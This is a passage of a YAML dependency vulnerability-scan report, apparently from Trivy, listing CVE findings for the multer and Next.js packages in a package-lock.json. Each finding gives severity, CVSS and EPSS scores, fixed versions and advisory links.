version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.351066666666668
|
|
epss: 0.00019
|
|
epss_percentile: 0.05291
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00076
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 80d0e617807f9c3a
|
|
ruleId: CVE-2026-3304
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'multer: Multer: Denial of Service via malformed requests'
|
|
title: CVE-2026-3304
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
|
|
a Denial of Service (DoS) by sending malformed requests, potentially causing resource
|
|
exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known
|
|
workarounds are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-3304
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id022
|
|
- CWE-459
|
|
raw:
|
|
VulnerabilityID: CVE-2026-3304
|
|
VendorIDs:
|
|
- GHSA-xf7r-hgr6-v32p
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.1.0
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3304
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:3b0f6823eb0c1e72928cebbdc160db403df646f5c8b21b9a9e90eaccb686a712
|
|
Title: 'multer: Multer: Denial of Service via malformed requests'
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
|
|
a Denial of Service (DoS) by sending malformed requests, potentially causing
|
|
resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch.
|
|
No known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id022
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
nvd: 3
|
|
redhat: 3
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
|
|
V40Score: 8.7
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-3304
|
|
- https://cna.openjsf.org/security-advisories.html
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-3304
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-3304
|
|
PublishedDate: '2026-02-27T16:16:26.38Z'
|
|
LastModifiedDate: '2026-03-19T17:28:33.81Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.351066666666668
|
|
epss: 0.00019
|
|
epss_percentile: 0.05291
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00076
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 19ed6f114225796d
|
|
ruleId: CVE-2026-3520
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'multer: Multer: Denial of Service via malformed requests'
|
|
title: CVE-2026-3520
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger
|
|
a Denial of Service (DoS) by sending malformed requests, potentially causing stack
|
|
overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds
|
|
are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-3520
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id023
|
|
- CWE-674
|
|
raw:
|
|
VulnerabilityID: CVE-2026-3520
|
|
VendorIDs:
|
|
- GHSA-5528-5vmv-3xc2
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.1.1
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3520
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:1aea2a5deada40cd424b21793dc1ffd01b2c216d423aacafc67d0013c6fd0530
|
|
Title: 'multer: Multer: Denial of Service via malformed requests'
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger
|
|
a Denial of Service (DoS) by sending malformed requests, potentially causing
|
|
stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No
|
|
known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id023
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
nvd: 3
|
|
redhat: 3
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
|
|
V40Score: 8.7
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-3520
|
|
- https://cna.openjsf.org/security-advisories.html
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-3520
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-3520
|
|
PublishedDate: '2026-03-04T17:16:22.61Z'
|
|
LastModifiedDate: '2026-03-09T18:03:23.1Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.39586666666667
|
|
epss: 0.00067
|
|
epss_percentile: 0.20499
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00268
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8b483b8e54efe250
|
|
ruleId: CVE-2025-29927
|
|
severity: CRITICAL
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'nextjs: Authorization Bypass in Next.js Middleware'
|
|
title: CVE-2025-29927
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and
|
|
15.2.3, it is possible to bypass authorization checks within a Next.js application,
|
|
if the authorization check occurs in middleware. If patching to a safe version
|
|
is infeasible, it is recommend that you prevent external user requests which contain
|
|
the x-middleware-subrequest header from reaching your Next.js application. This
|
|
vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-29927
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id024
|
|
- CWE-285
|
|
- CWE-863
|
|
raw:
|
|
VulnerabilityID: CVE-2025-29927
|
|
VendorIDs:
|
|
- GHSA-f82v-jwr5-mffw
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 13.5.9, 14.2.25, 15.2.3, 12.3.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-29927
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007
|
|
Title: 'nextjs: Authorization Bypass in Next.js Middleware'
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and
|
|
15.2.3, it is possible to bypass authorization checks within a Next.js application,
|
|
if the authorization check occurs in middleware. If patching to a safe version
|
|
is infeasible, it is recommend that you prevent external user requests which
|
|
contain the x-middleware-subrequest header from reaching your Next.js application.
|
|
This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
|
|
Severity: CRITICAL
|
|
CweIDs: *id024
|
|
VendorSeverity:
|
|
ghsa: 4
|
|
redhat: 4
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
|
V3Score: 9.1
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
|
V3Score: 9.1
|
|
References:
|
|
- http://www.openwall.com/lists/oss-security/2025/03/23/3
|
|
- http://www.openwall.com/lists/oss-security/2025/03/23/4
|
|
- https://access.redhat.com/security/cve/CVE-2025-29927
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2
|
|
- https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48
|
|
- https://github.com/vercel/next.js/releases/tag/v12.3.5
|
|
- https://github.com/vercel/next.js/releases/tag/v13.5.9
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
|
|
- https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
|
|
- https://security.netapp.com/advisory/ntap-20250328-0002
|
|
- https://security.netapp.com/advisory/ntap-20250328-0002/
|
|
- https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-29927
|
|
PublishedDate: '2025-03-21T15:15:42.66Z'
|
|
LastModifiedDate: '2025-09-10T15:49:40.637Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A01:2021
|
|
cweTop25_2024:
|
|
- id: CWE-863
|
|
rank: 24
|
|
category: Authorization
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 100.0
|
|
epss: 0.92118
|
|
epss_percentile: 0.99719
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 10
|
|
epss_multiplier: 4.68472
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 805b9e4959b28bb7
|
|
ruleId: CVE-2024-46982
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js Cache Poisoning
|
|
title: CVE-2024-46982
|
|
description: 'Next.js is a React framework for building full-stack web applications.
|
|
By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic
|
|
server-side rendered route in the pages router (this does not affect the app router).
|
|
When this crafted request is sent it could coerce Next.js to cache a route that
|
|
is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate`
|
|
header which some upstream CDNs may cache as well. To be potentially affected
|
|
all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using
|
|
pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx`
|
|
not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7,
|
|
v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce
|
|
the issue or not. There are no official or recommended workarounds for this issue,
|
|
we recommend that users patch to a safe version.'
|
|
remediation: https://avd.aquasec.com/nvd/cve-2024-46982
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id025
|
|
- CWE-639
|
|
raw:
|
|
VulnerabilityID: CVE-2024-46982
|
|
VendorIDs:
|
|
- GHSA-gp8f-8m3g-qvj9
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 13.5.7, 14.2.10
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-46982
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084
|
|
Title: Next.js Cache Poisoning
|
|
Description: 'Next.js is a React framework for building full-stack web applications.
|
|
By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic
|
|
server-side rendered route in the pages router (this does not affect the app
|
|
router). When this crafted request is sent it could coerce Next.js to cache
|
|
a route that is meant to not be cached and send a `Cache-Control: s-maxage=1,
|
|
stale-while-revalidate` header which some upstream CDNs may cache as well. To
|
|
be potentially affected all of the following must apply: 1. Next.js between
|
|
13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side
|
|
rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This
|
|
vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend
|
|
upgrading regardless of whether you can reproduce the issue or not. There are
|
|
no official or recommended workarounds for this issue, we recommend that users
|
|
patch to a safe version.'
|
|
Severity: HIGH
|
|
CweIDs: *id025
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
|
|
V3Score: 7.5
|
|
V40Score: 8.7
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3
|
|
- https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-46982
|
|
PublishedDate: '2024-09-17T22:15:02.273Z'
|
|
LastModifiedDate: '2025-09-10T15:46:05.173Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A01:2021
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 69.12453333333335
|
|
epss: 0.49062
|
|
epss_percentile: 0.97812
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 2.9624800000000002
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ea84684553ce61ab
|
|
ruleId: CVE-2024-51479
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'next.js: next: authorization bypass in Next.js'
|
|
title: CVE-2024-51479
|
|
description: 'Next.js is a React framework for building full-stack web applications.
|
|
In affected versions if a Next.js application is performing authorization in middleware
|
|
based on pathname, it was possible for this authorization to be bypassed for pages
|
|
directly under the application''s root directory. For example: * [Not affected]
|
|
`https://example.com/` * [Affected] `https://example.com/foo` * [Not affected]
|
|
`https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and
|
|
later. If your Next.js application is hosted on Vercel, this vulnerability has
|
|
been automatically mitigated, regardless of Next.js version. There are no official
|
|
workarounds for this vulnerability.'
|
|
remediation: https://avd.aquasec.com/nvd/cve-2024-51479
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id026
|
|
- CWE-285
|
|
- CWE-863
|
|
raw:
|
|
VulnerabilityID: CVE-2024-51479
|
|
VendorIDs:
|
|
- GHSA-7gfc-8cq8-jh5f
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 14.2.15
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-51479
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55
|
|
Title: 'next.js: next: authorization bypass in Next.js'
|
|
Description: 'Next.js is a React framework for building full-stack web applications.
|
|
In affected versions if a Next.js application is performing authorization in
|
|
middleware based on pathname, it was possible for this authorization to be bypassed
|
|
for pages directly under the application''s root directory. For example: * [Not
|
|
affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not
|
|
affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15`
|
|
and later. If your Next.js application is hosted on Vercel, this vulnerability
|
|
has been automatically mitigated, regardless of Next.js version. There are no
|
|
official workarounds for this vulnerability.'
|
|
Severity: HIGH
|
|
CweIDs: *id026
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 7.5
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2024-51479
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b
|
|
- https://github.com/vercel/next.js/releases/tag/v14.2.15
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-51479
|
|
- https://www.cve.org/CVERecord?id=CVE-2024-51479
|
|
PublishedDate: '2024-12-17T19:15:06.697Z'
|
|
LastModifiedDate: '2025-09-10T15:48:08.253Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A01:2021
|
|
cweTop25_2024:
|
|
- id: CWE-863
|
|
rank: 24
|
|
category: Authorization
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 96.60839999999999
|
|
epss: 0.78509
|
|
epss_percentile: 0.99056
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 4.140359999999999
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 668e2a15050688ec
|
|
ruleId: CVE-2026-44573
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js has a Middleware / Proxy bypass in Pages Router applications using
|
|
i18n
|
|
title: CVE-2026-44573
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router
|
|
with i18n configured and middleware/proxy-based authorization can allow unauthorized
|
|
access to protected page data through locale-less /_next/data/<buildId>/<page>.json
|
|
requests. In affected configurations, middleware does not run for the unprefixed
|
|
data route, allowing an attacker to retrieve SSR JSON for protected pages without
|
|
passing the intended authorization checks. This vulnerability is fixed in 15.5.16
|
|
and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44573
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id027
|
|
- CWE-863
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44573
|
|
VendorIDs:
|
|
- GHSA-36qx-fr4f-26g5
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44573
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d
|
|
Title: Next.js has a Middleware / Proxy bypass in Pages Router applications using
|
|
i18n
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router
|
|
with i18n configured and middleware/proxy-based authorization can allow unauthorized
|
|
access to protected page data through locale-less /_next/data/<buildId>/<page>.json
|
|
requests. In affected configurations, middleware does not run for the unprefixed
|
|
data route, allowing an attacker to retrieve SSR JSON for protected pages without
|
|
passing the intended authorization checks. This vulnerability is fixed in 15.5.16
|
|
and 16.2.5.
|
|
Severity: HIGH
|
|
CweIDs: *id027
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44573
|
|
PublishedDate: '2026-05-13T17:16:22.627Z'
|
|
LastModifiedDate: '2026-05-14T12:24:22.91Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A01:2021
|
|
cweTop25_2024:
|
|
- id: CWE-863
|
|
rank: 24
|
|
category: Authorization
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.381866666666667
|
|
epss: 0.00052
|
|
epss_percentile: 0.1631
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00208
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6cbf7b1b47550df1
|
|
ruleId: CVE-2026-44578
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Next.js vulnerable to server-side request forgery in applications using
|
|
WebSocket upgrades
|
|
title: CVE-2026-44578
|
|
description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the
|
|
built-in Node.js server can be vulnerable to server-side request forgery through
|
|
crafted WebSocket upgrade requests. An attacker can cause the server to proxy
|
|
requests to arbitrary internal or external destinations, which may expose internal
|
|
services or cloud metadata endpoints. Vercel-hosted deployments are not affected.
|
|
This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44578
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:next@14.2.3
|
|
risk:
|
|
cwe: &id028
|
|
- CWE-918
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44578
|
|
VendorIDs:
|
|
- GHSA-c4j6-fc7j-m34r
|
|
PkgID: next@14.2.3
|
|
PkgName: next
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/next@14.2.3
|
|
UID: 494c23d2c970c8b
|
|
InstalledVersion: 14.2.3
|
|
FixedVersion: 15.5.16, 16.2.5
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44578
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4
|
|
Title: Next.js vulnerable to server-side request forgery in applications using
|
|
WebSocket upgrades
|
|
Description: Next.js is a React framework for building full-stack web applications.
|
|
From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the
|
|
built-in Node.js server can be vulnerable to server-side request forgery through
|
|
crafted WebSocket upgrade requests. An attacker can cause the server to proxy
|
|
requests to arbitrary internal or external destinations, which may expose internal
|
|
services or cloud metadata endpoints. Vercel-hosted deployments are not affected.
|
|
This vulnerability is fixed in 15.5.16 and 16.2.5.
|
|
Severity: HIGH
|
|
CweIDs: *id028
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
V3Score: 8.6
|
|
References:
|
|
- https://github.com/vercel/next.js
|
|
- https://github.com/vercel/next.js/releases/tag/v15.5.16
|
|
- https://github.com/vercel/next.js/releases/tag/v16.2.5
|
|
- https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44578
|
|
PublishedDate: '2026-05-13T18:16:17.99Z'
|
|
LastModifiedDate: '2026-05-14T18:34:38.53Z'
|
|
context:
|
|
sbom:
|
|
name: next
|
|
version: 14.2.3
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A10:2021
|
|
cweTop25_2024:
|
|
- id: CWE-918
|
|
rank: 19
|
|
category: SSRF
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 27.510933333333334
|
|
epss: 0.04476
|
|
epss_percentile: 0.89216
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
